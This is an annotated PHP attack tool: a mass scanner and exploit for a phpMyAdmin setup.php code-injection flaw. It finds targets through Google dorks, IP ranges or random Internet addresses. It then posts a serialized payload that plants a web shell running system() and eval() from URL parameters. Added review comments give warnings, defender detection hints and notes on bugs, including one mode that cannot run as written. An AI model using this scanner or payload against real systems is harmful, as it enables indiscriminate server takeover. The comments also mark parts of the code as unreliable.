Googleinurl

[SCANNER] phpMyAdmin Code Injection RCE Scanner & Exploit

Jun 26th, 2015
  1. <?php
  2.  
  3. error_reporting(0);
  4. set_time_limit(0);
  5. ini_set('memory_limit', '256M');
  6. ini_set('display_errors', 0);
  7. ini_set('max_execution_time', 0);
  8. ini_set('allow_url_fopen', 1);
  9. /*
  10.  * ***************************************************************
  11.   pmaPWN.php - d3ck4, hacking.expose@gmail.com
  12.   phpMyAdmin Code Injection RCE Scanner & Exploit
  13.   This is PHP version original http://milw0rm.com/exploits/8921
  14.   credit: Greg Ose, pagvac @ gnucitizen.org
  15.   greetz: Hacking Expose!, HM Security, darkc0de
  16.  * ***************************************************************
  17.  
  Edited by GoogleINURL
  blog.inurl.com.br

  NOTE: the "DORKING" and "RANGE IP RANDOM" modes pick targets the operator
  has no relationship with. Run this only against systems you are explicitly
  authorised to test. Requires the curl extension; written for PHP 5-era
  semantics (loose comparisons, silent undefined-variable access).
 */
  21.  
  22.  
  23. $list = array(
  24.     '/phpmyadmin/',
  25.     '/phpMyAdmin/',
  26.     '/PMA/',
  27.     '/pma/',
  28.     '/admin/',
  29.     '/dbadmin/',
  30.     '/mysql/',
  31.     '/myadmin/',
  32.     '/phpmyadmin2/',
  33.     '/phpMyAdmin2/',
  34.     '/phpMyAdmin-2/',
  35.     '/php-my-admin/',
  36.     '/phpMyAdmin-2.2.3/',
  37.     '/phpMyAdmin-2.2.6/',
  38.     '/phpMyAdmin-2.5.1/',
  39.     '/phpMyAdmin-2.5.4/',
  40.     '/phpMyAdmin-2.5.5-rc1/',
  41.     '/phpMyAdmin-2.5.5-rc2/',
  42.     '/phpMyAdmin-2.5.5/',
  43.     '/phpMyAdmin-2.5.5-pl1/',
  44.     '/phpMyAdmin-2.5.6-rc1/',
  45.     '/phpMyAdmin-2.5.6-rc2/',
  46.     '/phpMyAdmin-2.5.6/',
  47.     '/phpMyAdmin-2.5.7/',
  48.     '/phpMyAdmin-2.5.7-pl1/',
  49.     '/phpMyAdmin-2.6.0-alpha/',
  50.     '/phpMyAdmin-2.6.0-alpha2/',
  51.     '/phpMyAdmin-2.6.0-beta1/',
  52.     '/phpMyAdmin-2.6.0-beta2/',
  53.     '/phpMyAdmin-2.6.0-rc1/',
  54.     '/phpMyAdmin-2.6.0-rc2/',
  55.     '/phpMyAdmin-2.6.0-rc3/',
  56.     '/phpMyAdmin-2.6.0/',
  57.     '/phpMyAdmin-2.6.0-pl1/',
  58.     '/phpMyAdmin-2.6.0-pl2/',
  59.     '/phpMyAdmin-2.6.0-pl3/',
  60.     '/phpMyAdmin-2.6.1-rc1/',
  61.     '/phpMyAdmin-2.6.1-rc2/',
  62.     '/phpMyAdmin-2.6.1/',
  63.     '/phpMyAdmin-2.6.1-pl1/',
  64.     '/phpMyAdmin-2.6.1-pl2/',
  65.     '/phpMyAdmin-2.6.1-pl3/',
  66.     '/phpMyAdmin-2.6.2-rc1/',
  67.     '/phpMyAdmin-2.6.2-beta1/',
  68.     '/phpMyAdmin-2.6.2-rc1/',
  69.     '/phpMyAdmin-2.6.2/',
  70.     '/phpMyAdmin-2.6.2-pl1/',
  71.     '/phpMyAdmin-2.6.3/',
  72.     '/phpMyAdmin-2.6.3-rc1/',
  73.     '/phpMyAdmin-2.6.3/',
  74.     '/phpMyAdmin-2.6.3-pl1/',
  75.     '/phpMyAdmin-2.6.4-rc1/',
  76.     '/phpMyAdmin-2.6.4-pl1/',
  77.     '/phpMyAdmin-2.6.4-pl2/',
  78.     '/phpMyAdmin-2.6.4-pl3/',
  79.     '/phpMyAdmin-2.6.4-pl4/',
  80.     '/phpMyAdmin-2.6.4/',
  81.     '/phpMyAdmin-2.7.0-beta1/',
  82.     '/phpMyAdmin-2.7.0-rc1/',
  83.     '/phpMyAdmin-2.7.0-pl1/',
  84.     '/phpMyAdmin-2.7.0-pl2/',
  85.     '/phpMyAdmin-2.7.0/',
  86.     '/phpMyAdmin-2.8.0-beta1/',
  87.     '/phpMyAdmin-2.8.0-rc1/',
  88.     '/phpMyAdmin-2.8.0-rc2/',
  89.     '/phpMyAdmin-2.8.0/',
  90.     '/phpMyAdmin-2.8.0.1/',
  91.     '/phpMyAdmin-2.8.0.2/',
  92.     '/phpMyAdmin-2.8.0.3/',
  93.     '/phpMyAdmin-2.8.0.4/',
  94.     '/phpMyAdmin-2.8.1-rc1/',
  95.     '/phpMyAdmin-2.8.1/',
  96.     '/phpMyAdmin-2.8.2/',
  97.     '/sqlmanager/',
  98.     '/mysqlmanager/',
  99.     '/p/m/a/',
  100.     '/PMA2005/',
  101.     '/pma2005/',
  102.     '/phpmanager/',
  103.     '/php-myadmin/',
  104.     '/phpmy-admin/',
  105.     '/webadmin/',
  106.     '/sqlweb/',
  107.     '/websql/',
  108.     '/webdb/',
  109.     '/mysqladmin/',
  110.     '/mysql-admin/',
  111. );
  112.  
  113. function filterHost($array = array()) {
  114.     if (!empty($array)) {
  115.         foreach ($array as $value) {
  116.             $real = parse_url("http://{$value}");
  117.             $_[] = "http://" . $real['host'];
  118.         }
  119.  
  120.         return array_filter(array_unique($_));
  121.     } else {
  122.  
  123.         return NULL;
  124.     }
  125. }
  126.  
  127. ################################################################################
  128. #GENERATOR RANGE IP#############################################################
  129. ################################################################################
  130.  
  131. function __generatorRangeIP($range) {
  132.  
  133.     $ip_ = explode(',', $range);
  134.     if (is_array($ip_)) {
  135.  
  136.         $_ = array(0 => ip2long($ip_[0]), 1 => ip2long($ip_[1]));
  137.         while ($_[0] <= $_[1]) {
  138.  
  139.             $ips[] = "http://" . long2ip($_[0]);
  140.             $_[0] ++;
  141.         }
  142.     } else {
  143.  
  144.         return FALSE;
  145.     }
  146.  
  147.     return $ips;
  148. }
  149.  
  150. ################################################################################
  151. #GENERATOR RANGE IP RANDOM######################################################
  152. ################################################################################
  153.  
/**
 * Build $cont[1] random "http://a.b.c.d" strings, each octet drawn from
 * rand(0, 255).
 *
 * NOTE(review): this backs the "RANGE IP RANDOM" mode, i.e. probing arbitrary
 * Internet hosts the operator has no relationship with. There is no
 * authorisation model; do not run this outside a lab network you own.
 *
 * @param array $cont two-element array: index 1 is the number of addresses
 *                    wanted; index 0 is overwritten and used as the counter
 * @return array the generated strings after array_unique(), so the result
 *               may be shorter than requested. When $cont[1] <= 0 the loop
 *               never runs, $ip is never assigned and array_unique() gets
 *               NULL (a TypeError on PHP 8).
 */
function __generatorIPRandom($cont) {

    $cont[0] = 0;
    while ($cont[0] < $cont[1]) {

        // No filtering of reserved, private or multicast space (0/8, 10/8,
        // 127/8, 224/4, ...), so part of the output is unroutable.
        $bloc[0] = rand(0, 255);
        $bloc[1] = rand(0, 255);
        $bloc[2] = rand(0, 255);
        $bloc[3] = rand(0, 255);
        $ip[] = "http://{$bloc[0]}.{$bloc[1]}.{$bloc[2]}.{$bloc[3]}";

        $cont[0] ++;
    }
    return array_unique($ip);
}
  169.  
  170. $banner = "
  171. \t---------------------------------------------------------------
  172. \t        phpMyAdmin Code Injection RCE Scanner & Exploit
  173. \t  This is PHP version original http://milw0rm.com/exploits/8921
  174. \t        Edited by GoogleINURL - http://blog.inurl.com.br
  175. \t---------------------------------------------------------------
  176. \n";
  177.  
  178. if ($argc > 1) {
  179.     print $banner;
  180.     print "Usage: php $argv[0] \n";
  181.     exit;
  182. }
  183.  
  184. print $banner;
  185. print "\n";
  186. $Handlex = FOpen("pmaPWN.log", "a+");
  187. FWrite($Handlex, $banner);
  188.  
  189. print "[-] Master, where you want to go today? \n";
  190. print "[-] OPTIONS: \n";
  191. print "---------------------------------------------------------------------\n";
  192. print "[+] DORKING:         [ 1 ]\n";
  193. print "[+] RANGE IP:        [ 2 ]\n";
  194. print "[+] RANGE IP RANDOM: [ 3 ]\n";
  195. print "[+] VALUES FILE:     [ 4 ]\n";
  196. print "---------------------------------------------------------------------\n";
  197. fwrite(STDOUT, "\nGoogleINURL@scan:/options#  ");
  198. $op = trim(fgets(STDIN));
  199.  
// Option 1, "DORKING": collect targets by scraping one Google results page.
// The "QUERY: SELECT ... FROM `googledb`" text is cosmetic; there is no
// database, the URL-encoded dork goes straight into a google.com.br search.
if ($op == 1) {
    print "[-] example: intitle:phpMyAdmin\n";
    fwrite(STDOUT, "GoogleINURL@scan:/options/set_dork#  ");
    $dork = urlencode(trim(fgets(STDIN)));
    print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
    FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
//for($i = 0; $i <= 2; $i+=100) {
    // Single request asking for num=1500 results with a 2007 Firefox UA and a
    // fake Referer. NOTE(review): a scraper like this is presumably answered
    // with a CAPTCHA/consent page rather than results, in which case the regex
    // below matches nothing and the run ends with "ERRO SEM RESULTADOS".
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://www.google.com.br/search?q=$dork&num=1500&btnG=Search&pws=1");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
    $pg = curl_exec($ch);
    curl_close($ch);

# Search engine and validation regex changed by GoogleINURL - 26/jun/2015
    // Unwrap Google's "/url?q=<target>" redirect links, then blank out links
    // back to Google itself and to phpmyadmin.net so the scheme-anchored
    // regex below no longer matches them.
    $html = str_replace('href="/url?q=', 'href="', $pg);
    $html = str_replace('https://www.google.com.br', '', $html);
    $html = str_replace('http://www.phpmyadmin.net', '', $html);

    // Result anchors in the 2015 markup: <h3 class="r"><a href="http(s)://...">.
    // Capture 2 is everything after the scheme (host plus path). Tied to that
    // layout: a markup change silently yields an empty target list.
    preg_match_all("#(<h3 class=\"r\"><a href=\"http[s]?://(.*?)\">)#si", $html, $links);
    $_ = array_filter(array_unique($links[2]));

//if (preg_match_all($reg, $html, $links)) { $res[] = $links[2]; }
//}
    // Collapse to unique "http://host" origins; filterHost() returns NULL for
    // an empty list, which the check after the option handlers treats as
    // "no results".
    $res = filterHost($_);
}
  230.  
  231. if ($op == 2) {
  232.     print "\n[-] example: 200.107.69.1,200.107.69.255 \n";
  233.     fwrite(STDOUT, "GoogleINURL@scan:/options/set_range#  ");
  234.     $value = (trim(fgets(STDIN)));
  235.     $res = __generatorRangeIP($value);
  236. }
  237.  
// Option 3, "RANGE IP RANDOM": N random IPv4 addresses anywhere on the
// Internet (see __generatorIPRandom()). No authorisation model exists here.
// NOTE(review): `array([0] => 0, 1 => $value)` uses the array literal `[0]`
// as a key. That is a parse error before PHP 5.4 and an "Illegal offset type"
// error from 5.4 on, so this option cannot run as written. $value is also
// passed as the raw string typed by the user and is never range-checked.
if ($op == 3) {
    print "\n[-] Amount of IPS / example: 255 \n";
    fwrite(STDOUT, "GoogleINURL@scan:/options/set_range_rand#  ");
    $value = (trim(fgets(STDIN)));
    $res = __generatorIPRandom(array([0] => 0, 1 => $value));
}
  244.  
  245. if ($op == 4) {
  246.     print "[-] example: hosts.txt ";
  247.     fwrite(STDOUT, "\nGoogleINURL@scan:/options/set_file#  ");
  248.     $value = (trim(fgets(STDIN)));
  249.     $res = array_unique(array_filter(explode("\n", file_get_contents($value))));
  250. }
  251.  
  252.  
  253.  
  254. (!isset($res) && empty($res) ? exit("\n[x] ERRO SEM RESULTADOS\n") : NULL);
  255. print "---------------------------------------------------------------------\n";
  256. $total = count($res);
  257. print "\n[+] Done. $total rows return.\n";
  258. FWrite($Handlex, "[+] Done. $total rows return.\n");
  259. FClose($Handlex);
  260.  
  261. //   foreach($res as $key) {
// Main scan loop. For every "http://host" target: log it, wait 5 s, request
// all candidate directories in parallel through curl_multi, then inspect each
// body for phpMyAdmin's page title and hand hits to exploit_site().
// Network fingerprint for defenders: a burst of count($list) GETs for the
// paths above from one source, a 5 s pause, then (on a hit) requests to
// <dir>scripts/setup.php and <dir>config/config.inc.php. Everything is also
// written to pmaPWN.log in the current directory.
$cont = 1;
foreach ($res as $url) {

    $Handlex = FOpen("pmaPWN.log", "a+");
    //$real = parse_url("http://{$target}");
    //$url = "http://" . $real['host'];
    print "\n[ {$cont} / {$total} ][-] Scanning phpMyAdmin on " . $url . "\n";
    $cont++;
    FWrite($Handlex, "\n[-] Scanning phpMyAdmin on " . $url . "\n");
    FClose($Handlex);
    sleep(5);
    // One easy handle per candidate path, all fired at once; $url must carry
    // the scheme and no trailing slash since $list[$i] starts with "/".
    $curlHandle = curl_multi_init();
    for ($i = 0; $i < count($list); $i++)
        $curl[$i] = addHandle($curlHandle, $url . $list[$i]);
    ExecHandle($curlHandle);
    for ($i = 0; $i < count($list); $i++) {
        // Body only (addHandle sets CURLOPT_HEADER=0); empty on failure.
        $text[$i] = curl_multi_getcontent($curl[$i]);
        //echo $url.$list[$i]."\n";
        // NOTE(review): the log is reopened for every path but only closed
        // inside the if below, so each non-matching path leaks a file handle.
        $Handlex = FOpen("pmaPWN.log", "a+");
        // Precedence: `and` binds tighter than `or`, so this reads
        // title-is-phpMyAdmin OR (title-is-Access-denied AND body mentions phpMyAdmin).
        if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
            print "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]";
            print "\n[+] Testing vulnerable, wait sec..\n";
            FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]");
            FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
            // The author treats this sentence as the signature of a main page
            // served without a login prompt (hedged: not verified here).
            if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
                print "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n";
                FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n");
            }
            FClose($Handlex);
            // No break: every matching directory on the host is tested.
            exploit_site($url . $list[$i]);
        }
    }
    for ($i = 0; $i < count($list); $i++)//remove the handles
        curl_multi_remove_handle($curlHandle, $curl[$i]);
    curl_multi_close($curlHandle);
    sleep(5);
}
  299.  
  300. // }
  301.  
  302. function addHandle(&$curlHandle, $url) {
  303.     $cURL = curl_init();
  304.     curl_setopt($cURL, CURLOPT_URL, $url);
  305.     curl_setopt($cURL, CURLOPT_HEADER, 0);
  306.     curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
  307.     curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
  308.     curl_setopt($cURL, CURLOPT_CONNECTTIMEOUT, 10);
  309.     curl_multi_add_handle($curlHandle, $cURL);
  310.     return $cURL;
  311. }
  312.  
  313. //execute the handle until the flag passed
  314. // to function is greater then 0
  315. function ExecHandle(&$curlHandle) {
  316.     $flag = null;
  317.     do {
  318. //fetch pages in parallel
  319.         curl_multi_exec($curlHandle, $flag);
  320.     } while ($flag > 0);
  321. }
  322.  
/**
 * Second stage for one discovered phpMyAdmin directory ($url ends in "/").
 *
 * Fetches "<dir>scripts/setup.php" (headers included) and
 * "<dir>config/config.inc.php" (body only), then calls exploit() when the
 * setup response contains "200 OK" and the word "token", and the second
 * response also matches /200 OK/. Defensively: an install where
 * scripts/setup.php has been removed never reaches exploit().
 *
 * NOTE(review): $ch2 is created without CURLOPT_HEADER, so $result2 is the
 * response body, not the status line; "200 OK" only matches if the body
 * itself contains that text, so the exploit branch fires far less often than
 * the messages suggest.
 * NOTE(review): the two timeout options written after curl_init() for $ch2
 * are applied to $ch, which is already closed; $ch2 runs with libcurl's
 * defaults (no overall timeout).
 *
 * @param string $url phpMyAdmin directory URL with trailing slash
 * @return void
 */
function exploit_site($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 100);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php");
    $result = curl_exec($ch);
    curl_close($ch);
    $ch2 = curl_init();
    curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 100);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php");
    $result2 = curl_exec($ch2);
    curl_close($ch2);
    //print $url;
    if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
        print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
        print "\n[+] Exploiting, wait sec..\n";
        $Handlex = FOpen("pmaPWN.log", "a+");
        FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
        FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
        FClose($Handlex);
        exploit($url);
    } else {
        $Handlex = FOpen("pmaPWN.log", "a+");
        print "\n[-] Shit! no luck.. not vulnerable\n";
        FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
        FClose($Handlex);
    }
}
  355.  
/**
 * Third stage: turn a reachable scripts/setup.php into a web shell by abusing
 * the setup script's "save configuration" action (the milw0rm 8921 issue;
 * publicly tracked as CVE-2009-1151 — verify before citing).
 *
 * What the code below does:
 *  1. GET <dir>scripts/setup.php with a cookie jar (exploitcookie.txt) so the
 *     setup session survives, and scrape the SECOND `token" value="..."`
 *     attribute on the page ($matches[1][1]; fewer than two matches leaves
 *     $token NULL and the function reports "not vulnerable").
 *  2. POST action=save with a URL-encoded, PHP-serialized `configuration`
 *     array. Decoded, the Servers[0] entry's *key* (s:136) is
 *       host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}
 *                  if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//
 *     Presumably setup.php writes that key into config/config.inc.php as
 *     $cfg['Servers'][$i]['<key>'] = ..., so the `']` closes the index early
 *     and the rest is live PHP: ?c=<cmd> runs system(), ?p=<code> runs eval().
 *     The other fields (localhost, mysqli, tcp, compress=false,
 *     auth_type=config, user=root) just make the saved config well-formed.
 *  3. Print the resulting shell URL: <dir>config/config.inc.php?c=id
 *
 * Preconditions visible here, and therefore the mitigations: the setup script
 * must still be reachable and config/ must be writable by the web server.
 *
 * Detection hints for defenders (all derived from the requests built here):
 *  - POST /scripts/setup.php with action=save and a configuration= body
 *    holding serialized "Servers" plus system( / eval(.
 *  - Follow-up GETs to /config/config.inc.php?c= or ?p=.
 *  - Referer equal to the phpMyAdmin directory URL, a Firefox 2.0.0.20 UA,
 *    and a cookie jar reused across exactly two requests.
 *
 * NOTE(review): on the "no token" path the function returns before FClose()
 * and before the cookie file is unlinked, so the log handle leaks and
 * exploitcookie.txt stays on disk. The first request disables TLS
 * verification; the second sets CURLOPT_SSL_VERIFYHOST to 3, which is not
 * one of the documented values (0/1/2).
 *
 * @param string $w00t phpMyAdmin directory URL with trailing slash
 * @return void|false FALSE when no token could be scraped
 */
function exploit($w00t) {
    $Handlex = FOpen("pmaPWN.log", "a+");
    $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
    //first get cookie + token
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php"); //URL
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_TIMEOUT, 100);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
    curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
    curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
    $result = curl_exec($curl);
    curl_close($curl);
    // The match count is discarded (empty statement); only $matches is used.
    if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches))
        ;

    // Second occurrence of the token field on the page.
    $token = $matches[1][1];
    if ($token != '') {
        print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
        FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
        // Serialized config; "\$" keeps PHP from interpolating $_GET here so
        // the literal text reaches the target. See the header comment for the
        // decoded form.
        $payload = "token=" . $token . "&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
        print "\n[+] Sending evil payload mwahaha.. \n";
        FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
        curl_setopt($curl, CURLOPT_TIMEOUT, 200);
        curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
        curl_setopt($curl, CURLOPT_REFERER, $w00t);
        curl_setopt($curl, CURLOPT_POST, true);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
        curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
        curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
        $result = curl_exec($curl);
        curl_close($curl);

        // The response is never inspected: "success" is assumed after the POST.
        print "\n[!] w00t! w00t! You should now have shell here";
        print "\n[+] " . $w00t . "config/config.inc.php?c=id \n";
        print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
        FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
        FWrite($Handlex, "\n[+] " . $w00t . "config/config.inc.php?c=id \n");
    } else {
        print "\n[!] Shit! no luck.. not vulnerable\n";
        FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
        return false;
    }
    FClose($Handlex);
    if (file_exists('exploitcookie.txt')) {
        unlink('exploitcookie.txt');
    }
    //exit();
}